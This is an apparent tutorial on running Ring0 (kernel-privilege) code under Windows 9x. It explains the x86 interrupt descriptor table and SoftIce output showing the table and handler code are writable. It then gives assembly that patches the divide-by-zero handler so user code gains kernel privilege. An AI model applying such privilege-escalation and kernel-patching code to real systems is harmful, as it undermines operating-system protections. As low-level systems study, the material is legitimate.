Executing Ring0 code under Microsoft Windows 9x
1 - Knowledge Requirements:
- Asm x86
- Basics of the protected mode
2 - Why?
Why? What people would do with Ring0 code?
Well, I'd say "everything you can't do using Ring3 code". For instance, accessing protected registers (the debuging registers DR0-7, the control registers CR0-4...), executing protected instructions, and being able to basically do anything with the memory without any restrictions. In other words, there are many reasons. It's up to you to find yours, but be careful not to abuse it. There often is a better way than using Ring0 codes. For example, don't switch to Ring0 to write within a process' memory if you can just call
3 - Exceptions and Interrupts
a - Introduction
To understand the trick we use to switch to Ring0, we first need to understand how exceptions and interrupts are working.
For the sake of simplicity, let's consider exceptions and interrupts are the same thing. When an error occurs (divide by 0, write access to a read-only memory area...) an exception is triggered:
- The EFlags are pushed into the stack
- The CS selector is pushed
- The return address (the offset) is pushed
- Finally, the system executes a
jmp far to the exception's code
The return, if there is a return, is done using the iretd instruction.
How the system knows the exception's address? It uses the IDT (Interrupt Descriptor Table). This table contains all the necessary informations for the 256 exceptions/interruptions. The exceptions from 0 to 31 are already defined and cannot be masked and the ones from 32 to 255 are the maskable interrupts. The exception and interrupt numbers are called "vectors".
Here is the exception/interrupt list:
| N° Vecteur | Description |
|---|---|
| 0 | Divide Error |
| 1 | Debug Exception |
| 2 | NMI |
| 3 | Break Point |
| 4 | Into |
| 5 | Bound |
| 6 | Invalid Opcode |
| 7 | Device Not Available |
| 8 | Double Fault |
| 9 | Copro Segment Overrun |
| 10 | Invalid Task State Segment |
| 11 | Segment Not Present |
| 12 | Stack Fault |
| 13 | General Protection |
| 14 | Page Fault |
| 15 | Reserved By Intel |
| 16 | Floating Point Error |
| 17 | Alignment Check |
| 18 | Machine Check |
| 19-31 | Intel |
| 32-255 | Maskable Interrupt |
b - IDT
Now let's go back to the IDT. The IDT is an array which maps each vector to a function descriptor. The size of each descriptor is 8 byte (therefore, to access the n-th descriptor, you just need to add n*8 to the IDT's address).
So... How do we get the IDT's address? If you look at the mnemonic list you'll see two instructions related to the IDT:
Let's see how these two instructions are working: they both take a 6 byte memory address as an argument. The structure of these 6 bytes is as the following:
| 47-16 | 15-0 | Bit |
| IDT Base Address | IDT Limit |
The last valid byte is IDT Base Address + IDT Limit but we are especially interested in the IDT Base Address.
So, to get the IDTR register's content, we'll execute the following:
-
; In the code:
-
sidt fword ptr IDT_Limit
-
-
; And in the data:
-
IDT_Limit DW 0
-
IDT_BaseAddress DD 0
After this code, we have the IDT address in the variable
c - IDT's Descriptor
Now that we know how to get the IDT address, let's take a look at the structure of its descriptors.
There are 3 kind of descriptors: task gates, interrupt gates and trap gates. As already said earlier, each one of them are 8 byte long, and here are their structures:
Task Gate:
| 31-16 | 15 | 14-13 | 12-8 | 7-0 | |
| Reserved | P | DPL | 00101 | Reserved | +4 |
| TSS Segment Selector | Reserved | +0 | |||
Interrupt Gate:
| 31-16 | 15 | 14-13 | 12-8 | 7-5 | 4-0 | |
| Offset 31..16 | P | DPL | 01110 | 000 | Reserved | +4 |
| Segment Selector | Ofsset 0..15 | +0 | ||||
Trap Gate:
| 31-16 | 15 | 14-13 | 12-8 | 7-5 | 4-0 | |
| Offset 31..16 | P | DPL | 01111 | 000 | Reserved | +4 |
| Segment Selector | Ofsset 0..15 | +0 | ||||
DPL: Descriptor Privilege Level
OFFSET: Offset To Procedure Entry Point
P: Segment Present Bit
RESERVED: Do not use
SELECTOR: Segment Selector For Destination Code Segment
Here, we are going to focus on the Interrupt gate (by the way, you can also note that the Trap Gate has the exact same structure but one code). You can see that the interrupt offset is split in two parts: the bits 16-31 are located in the most significant bits of the last 4 byte of the descriptor, whereas the bits 0-15 are in the lower part of the first 4 byte.
Therefore, if
-
shl ebx,3 ; index*8 because 8 byte for each Descriptor
-
add eax,ebx ; compute the descriptor's address
-
mov esi,dword ptr [eax+4] ; get the 16 most significant bits of the offset
-
mov si,word ptr [eax] ; and the 16 least significant bits
4 - Switching to Ring0
OK... So... All these details are really nice, but... Why do we care? Some says patience is a virtue... Bear with me, we're almost there.
a - Analyze of Microsoft Windows 9x's IDT
To analyze Microsoft Windows 9x's IDT I'm going to use the famous NuMega's debugger, SoftIce/W. That's the best low level debugger you'll find for Microsoft Windows 9x and NT, and it's one of the most important tool you can get to reverse engineer pretty much anything. (NB: Unfortunately, SoftIce has recently been discontinued by CompuWare, the new owner of SoftIce. This is really sad to see an historical tool disapear like that. R.I.P.).
Under SoftIce, if you execute the command "idt", you should get something like that:
-
IDTBase=800A8000 Limit=02FF
-
Int Type Sel:Offset Attributes Symbol/Owner
-
000 IntG32 0028:C0001350 DPL=0 P VMM(01)+0350
-
001 IntG32 0028:C0001360 DPL=3 P VMM(01)+0360
-
002 IntG32 0028:C00046E0 DPL=3 P Simulate_IO+02A0
-
003 IntG32 0028:C0001370 DPL=3 P VMM(01)+0370
-
004 IntG32 0028:C0001380 DPL=3 P VMM(01)+0380
-
005 IntG32 0028:C0001390 DPL=3 P VMM(01)+0390
-
006 IntG32 0028:C00013A0 DPL=0 P VMM(01)+03A0
-
007 IntG32 0028:C00013B0 DPL=0 P VMM(01)+03B0
-
008 TaskG 0068:00000000 DPL=0 P
-
009 IntG32 0028:C00013C0 DPL=0 P VMM(01)+03C0
-
...
This command gives us very precious informations. First, you can see the IDT's address: 800A800. Let's ask SoftIce some informations about this memory address using the command "page 800A8000" (you could use the command "query" to get more informations as well).
-
Linear Physical Attributes Type
-
800A8000 0092D000 P D A U RW Private
What's interesting here is the field "attributes". Can you see the "RW"? ![]()
Welcome to the Microsoft Windows 9x's world... This table is readable and writable! This means anyone can access and modify it. One can wonders why Intel bothered to protect the LIDT instruction to prevent someone from playing with the IDT... We'll see later why being able to write to this table could be useful.
Let's continue our journey by focus on the vector 0. We can see this vector is an interrupt gate (its structure has been described earlier in this article), and we can see the address of the code executed when this interrupt is triggered. We use again the command page with this address: "page C0001350", and we get:
-
Linear Physical Attributes Type
-
C0001350 00110350 P D A U RW Private
It's getting better by the minutes... Wonderful land... The code itself is writable too, anyone could modify it inplace.
To finish this analysis, let's ask some informations about the selector using the command "GDT 0028". The command "GDT" gives the Global Descriptor Table, i.e. the table which contains all the selectors and their properties.
-
Sel. Type Base Limit DPL Attributes
-
0028 Code32 00000000 FFFFFFFF 0 P RE
What's very important here, is the selector's DPL: 0. It basically means that whenever the interrupt 0 is triggered (divide by zero), the interrupt's code is executed with a code privilege 0 (CPL 0).
To summarize, under Microsoft Windows 9x:
- the IDT is located in a writable memory,
- the interrupt 0 (divide by zero) has its code itself in a writable memory,
- and finally, its selector has a CPL 0.
b - Switching to Ring0 - first method
Now that we have all the informations that we need, we can design a first method to switch into CPL 0.
The idea of this first approach is the following: since the IDT is writable, nothing prevents us from from changing the address of one of the vectors to redirect it to our own function. While doing so, you shouldn't modify the selector but only the offset of the address. The selector is what gives the executed code its CPL 0, hence you really want to keep it the same. I won't give an example, it should be simple enough to implement, but remember to switch back the offset to its original value after your code has been executed. Another note: as for any interrupt, your function should not have any modified registers after giving back its control to the caller, and it should be using the "iretd" instruction instead of the normal "ret" instruction.
c - Switching to Ring0 - second method
Here is a 2nd method to switch into Ring0. Oh, by the way, I didn't invent any of them, and I don't know who did first. I really prefer this method for a reason I'll explain later.
In this method, instead of changing the interrupt entry point, we'll modify the code directly in memory (you do remember the code itself was writable? don't you?
). To make the explanations easier, let's start with the code itself:
-
sidt fword ptr IDT
-
mov eax , dword ptr [IDT+2] ; get the IDTs base address
-
mov esi , dword ptr [eax+4]
-
mov si , word ptr [eax] ; get the offset of the first vector interrupt
-
mov eax , dword ptr [esi] ; get the first 4 byte of code
-
mov Save1 , eax ; and save them
-
mov eax , dword ptr [esi+4] ; the 4 next byte
-
mov Save2 , eax ; and save them as well
-
mov CurrentSelector , cs ; save the current selector
-
mov IntAddress , esi ; save the interrupt address
-
mov dword ptr [esi] , 530E5858h ; write some code inplace of the existing code
-
mov byte ptr [esi+4] , 0CFh ; some more code
-
lea ebx , Ring0Code ; we load in eax the address to execute with CPL 0
-
xor eax , eax
-
div eax ; divide by zero! the interrupt 0 is going to be triggered here
-
Ring0Code:
-
; Here we are in CPL 0
-
;...
-
-
mov esi , IntAddress ; esi is not supposed to be modified... but just in case...
-
mov dword ptr [esi] , 53515858h ; write some code in memory
-
mov byte ptr [esi+4] , 0CFh ; more code ...
-
xor ecx , ecx
-
mov cx , CurrentSelector ; restore back the old selector in cx
-
lea ebx , Ring3Back ; load the return address
-
xor eax , eax
-
div eax ; divide by zero!
-
Ring3Back:
-
; and we're back in CPL 3
-
-
mov esi , IntAddress
-
mov eax , Save1 ; restore the first 4 byte of the int 0's code
-
mov dword ptr [esi] , eax
-
mov eax , Save2 ; and the next 4
-
mov dword ptr [esi+4] , eax
-
;...
-
; That's it!
The explanations now. This is in fact quite simple. We get the IDT's address, using it we get the first interrupt address (divide by 0), and then, we backup the first 8 byte of the interrupt's code (we are going to modify the first 5 of them, but it's easier to save 8 byte). The whole trick is in these 5 magic bytes "58585153CFh" (remember that the DWORD are swapped in memory). The corresponding code is:
-
pop eax; pop the return offset
-
pop eax; pop the return selector
-
push cs; push the current selector to the stack
-
push ebx; push ebx to the stack
-
iretd; return
The idea is to exchange the real return address which is into the stack, with the address saved in ebx (remember that ebx has been initialized before executing the divide by zero instruction). But if we were just changing the offset it would not do the trick, we also swap the selector with the interrupt selector. We now have into the stack a new address, but moreover, a selector which has a CPL 0 capability. Therefore, the iretd instruction is going to initialize the register CS with this CPL 0 selector, which will have for effect to give our code the same privilege.
You can now do whatever you want! You can try to read the DR7 register for example (mov eax, DR7).
To go back in CPL 3, that's pretty much the same thing. We push the old selector (the CPL 3 selector) from ecx, so the code is slightly different:
-
pop eax;
-
pop eax;
-
push ecx;
-
push ebx;
-
iretd;
And we terminate by restoring the original int 0's code.
So why do I prefer this method? Simply because the code reading is more linear and easier: you don't have a separate function which deal with the Ring 0. It's also easier to make a macro out of this.
5 - Conclusion
That's it! I hope you have learnt something. If some parts are too fuzzy or you have found errors, don't hesitate to write a comment.
6 - References
-
Pentium® Processor Family Developer's Manual, Volume 3: Architecture and Programming Manual (devoloppers' insight CD-ROM)
This now can be found under the title IA-32 Intel® Architecture Software Developer’s Manual Volume 3: System Programming Guide - IRC Chatting
digg
del.icio.us
Reddit
NewsVine